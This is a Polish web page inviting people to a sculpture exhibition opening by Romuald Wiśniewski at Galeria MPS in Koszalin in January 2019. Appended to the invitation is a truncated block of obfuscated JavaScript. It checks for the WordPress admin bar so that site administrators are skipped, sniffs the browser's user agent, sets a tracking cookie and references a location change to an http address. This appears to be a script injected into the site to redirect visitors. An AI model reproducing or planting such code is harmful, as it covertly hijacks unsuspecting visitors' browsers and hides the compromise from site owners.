Zaproszenie na dziesiąty wernisaż MPS | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo! 

W imieniu Zarządu MPS International Sp. z o.o. oraz w imieniu Artysty Romualda Wiśniewskiego, serdecznie zapraszamy na dziesiąty już wernisaż w Galerii MPS.

Po raz pierwszy w historii Galerii MPS pokażemy wystawę rzeźby. Wystawa pt. „Romuald Wiśniewski – rzeźba”  będzie przedstawiać wolnostojące rzeźby – w większości odlane z brązu. Prace rzeźbiarskie będą ukazywać głównie człowieka i jego symboliczne zmagania z życiem. Koszaliński rzeźbiarz – Romuald Wiśniewski – to autor pomnika kardynała Ignacego Jeża z Koszalina oraz wielu pomników, statuetek, tablic pamiątkowych zrealizowanych dla Koszalina, Kołobrzegu, Szczecina, Zielonej Góry, Krakowa i innych miast w Polsce.
Wernisaż odbędzie się nietypowo w czwartek, czyli dnia 31.01.2019 r. o g. 15:00 na parterze budynku MPS.

Prosimy o potwierdzenie przybycia do dnia 28.01.2019 r. na adres: office@mps.koszalin.pl

Serdecznie zapraszamy!

  'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m